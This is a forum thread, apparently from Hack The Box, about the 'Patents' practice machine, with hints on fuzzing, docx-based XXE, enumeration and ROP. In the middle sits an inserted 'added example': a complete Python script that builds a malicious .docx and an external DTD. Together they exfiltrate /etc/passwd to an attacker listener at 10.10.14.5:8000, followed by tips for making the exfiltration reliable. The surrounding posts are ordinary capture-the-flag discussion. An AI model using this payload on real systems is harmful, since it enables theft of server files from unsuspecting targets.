Patents

@TazWake said:

@Ad0n said:

lol when a guy ranked omniscient and ranked 53 calls this a doozy, lol what chance do I have against this box. oh well, just reading the forums prior to digging in, hopefully this will be a struggle cuddle into a better understanding of something.

Don't give up and don't fret too much about what other people do. I've been in the top 50 and I found this box very hard, largely because there are a lot of steps and a lot of blind attacks. But I also found Sauna hard…

Hard / Easy boxes are very, very subjective.

Good talk, coach. I'm ready to get back in there.

@Ad0n said:

Good talk, coach. I'm ready to get back in there.

Being that I am the original poster of the comment you referred to originally, I agree with what @TazWake said. Hang in there :slight_smile:

3 days later and I got user after a wicked amount of scraping the clues off the forum and a whole lot of trial and error. Thanks for the nudge of confidence, guys, feeling good about it. Now onward and forwards.

Rooted! Very complicated and very interesting box. I had to turn my head on and start thinking outside the box. Respect for @gbyolo for this job.

Struggling with initial X** (I can trigger it but I can't find a usable payload to execute commands or exfiltrate files)… Any nudges? Thanks

Rooted…

Initial Foothold:
I don’t think anyone likes recursive fuzzing for a single file … :neutral:
It's all about the wordlist, row row row your boat, try the largest
Inspect what you find closely. Do some google kung fu
An XE* attack that works quite well. No need for automation on this. You learn more anyway if you don’t.
Sample DocX: Sample .doc and .docx download | File Examples Download
You're trying to find another file in the web client that provides you with capabilities for a foothold

User:
Once on the box, use your essential automated enumeration scripts to get “user”

Root:
Go back to initial n*** scan and see what other ports are open
ROP Emporium will help if you’ve never done these types of attacks
Once you get a shell, you're not done yet. You won't find it where you are
There are files hidden that will help you with your RE :slight_smile:

Hit me up on discord (I don’t respond to messages on the forums). Thanks!
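The hints above (trigger the X** through an uploaded docx, get a callback, then exfiltrate files) are the classic blind, out-of-band XXE pattern. The script below is an added example written for this thread, not code from the box author or from anyone posting here. Everything specific in it is an assumption for illustration: the callback listener `http://10.10.14.5:8000`, the hosted DTD name `x.dtd`, the exfiltrated file `/etc/passwd`, and, above all, the choice of `word/document.xml` as the part the target parses. As the hints say, the injection point depends on which part of the package the server actually reads, so `inject_into_docx` lets you try the same payload in any part of a real docx (for example the sample file linked above) rather than only in the minimal one built here.

```python
"""Craft a .docx whose XML prolog carries a blind (out-of-band) XXE payload.

Added example, not from the original thread or the box. All hosts, file
names and the injected part are assumptions for illustration.
"""
import io
import zipfile

# Constructed minimal OOXML package parts. [Content_Types].xml, _rels/.rels and
# word/document.xml are enough for a zip to be treated as a Word document.
CONTENT_TYPES = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>
"""

ROOT_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>
"""


def doctype_for(dtd_url: str, root_name: str = "root") -> str:
    """Internal DTD subset that makes the parser fetch an external DTD.

    A parser that resolves external parameter entities requests dtd_url while
    parsing; that request alone proves the injection point works. The root
    name only matters to validating parsers, so a mismatch is harmless here.
    """
    return f'<!DOCTYPE {root_name} [\n  <!ENTITY % ext SYSTEM "{dtd_url}">\n  %ext;\n]>\n'


def xxe_document_xml(dtd_url: str) -> str:
    """word/document.xml with the payload in its prolog (assumed injection part)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        + doctype_for(dtd_url, "w:document")
        + '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">\n'
        '  <w:body><w:p><w:r><w:t>xxe test</w:t></w:r></w:p></w:body>\n'
        '</w:document>\n'
    )


def attacker_dtd(callback_base: str, target_file: str = "/etc/passwd") -> str:
    """External DTD you host at dtd_url; this is what does the exfiltration.

    %file reads the target; %eval declares a second parameter entity whose URL
    embeds the file contents; resolving %exfil sends them to the callback.
    &#x25; is a percent sign, needed because a literal '%' is not allowed
    inside an entity value at that position.
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'{callback_base}/?d=%file;'\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def build_xxe_docx(dtd_url: str) -> bytes:
    """Package the constructed parts into an in-memory .docx (a zip)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", ROOT_RELS)
        z.writestr("word/document.xml", xxe_document_xml(dtd_url))
    return buf.getvalue()


def inject_into_docx(original: bytes, part_name: str, dtd_url: str) -> bytes:
    """Rewrite one XML part of an existing .docx so its prolog carries the
    payload; every other part is copied unchanged. Which part the target
    parses is what you have to discover; part_name is the caller's guess."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(original)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == part_name:
                text = data.decode("utf-8")
                if text.startswith("<?xml"):
                    # DOCTYPE must follow the XML declaration. standalone="yes"
                    # asserts there are no external declarations, so drop it.
                    end = text.index("?>") + 2
                    decl = text[:end].replace(' standalone="yes"', "")
                    text = decl + "\n" + doctype_for(dtd_url) + text[end:].lstrip()
                else:
                    text = doctype_for(dtd_url) + text
                data = text.encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()


def read_part(docx_bytes: bytes, name: str) -> str:
    """Pull one part back out to eyeball the payload before uploading."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.read(name).decode("utf-8")


if __name__ == "__main__":
    callback = "http://10.10.14.5:8000"  # assumed attacker listener
    with open("xxe.docx", "wb") as fh:
        fh.write(build_xxe_docx(f"{callback}/x.dtd"))
    with open("x.dtd", "w") as fh:
        fh.write(attacker_dtd(callback))
    print(f"wrote xxe.docx and x.dtd; serve x.dtd from {callback} and watch the log")
```

Serve `x.dtd` with any plain HTTP server on the callback host and watch its access log: the first hit (for `x.dtd`) tells you the parser resolved the external entity at all, the second (`/?d=...`) carries the file. Two caveats worth knowing before concluding "nothing connects back": a part that is never parsed server-side gives no callback however good the payload is, so rotate `part_name` through the package; and file contents with newlines or URL-unsafe characters break the exfil URL, so start with a single-line file and move to a parser-specific wrapper that base64-encodes the target once the callback works.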

Is fuzzing only to find the re/U******s? Or also to find LFI?

@bhsec said:

Is fuzzing only to find the re/U******s? Or also to find LFI?
yeap

Can anyone help me with spy part?
EDIT: got it, thanks @TazWake!

Found the file the author mentioned, but I don't see how this helps in finding the "injection point" for X**. Tried basically all the files inside D**X and also several different things I found for O*T files. But nothing wants to connect back to me.
If anyone could give me a nudge, I'd be really grateful :slight_smile:

The file loosely refers to where in a docx the X is enabled. Not all docx templates might have that location.

Just to chip in regarding the final step of the box (getting the root flag) - previous hints on here were very misleading to me, as neither whale-riding is required for that, nor a “second RE/PWN”, at least as of April 2020 - maybe they were unintended ways to get the flag earlier?

Either way, the other hints and tips were solid, thanks a lot @seekorswim @TazWake and @godylocks ! =)

Anyway, to actually get the root flag, you need to double-check the place where you usually find it - maybe it is indeed there, but something covers it. :wink:

@Konstant said:

Can anyone help me with spy part?
EDIT: got it, thanks @TazWake!

Now I'm stuck in the spy part :slight_smile:

I tried many wordlists, and got nothing except a LICENSE file.
How can I get the changelog file? PM me some hints.
Thanks.

@todzhang said:

I tried many wordlists, and got nothing except a LICENSE file.
How can I get the changelog file? PM me some hints.
Thanks.

Try more wordlists.

@todzhang said:
I tried many wordlists, and got nothing except a LICENSE file.
How can I get the changelog file? PM me some hints.
Thanks.

Yeah, it's a real large one :smile:

Hi, I am stuck with X**. Tried many permutations adopted from different sources. Would anybody like to guide me? If yes, I will show what I have done so far. My discord: Ric0#7152

@Ric0 said:

Hi, I am stuck with X**. Tried many permutations adopted from different sources. Would anybody like to guide me? If yes, I will show what I have done so far. My discord: Ric0#7152

Thanks to @EvilT0r13 for pushing me on the right track.

Hi, I retrieved the user flag and now I want to exploit the L** thing, but where do I get the binary from?

Edit: Found it 5 minutes later; I had a typo in my find command.

Finally rooted this monster! That was the hardest box I’ve seen yet; took me about two weeks and a lot of coaching to get through this, but I learned so much! Really, it’s incredible. Almost nothing required to beat this thing was really in my book of tricks, so I had to dig around for a lot of things.
But when things finally work, the satisfaction is incredible!

Thanks for the box @gbyolo, this has been one ■■■■ of a ride!

Got root! It's a really hard and very interesting box. One of the best boxes I've completed. Big thanks @gbyolo!
P.S. Why does this box have such a low rating!?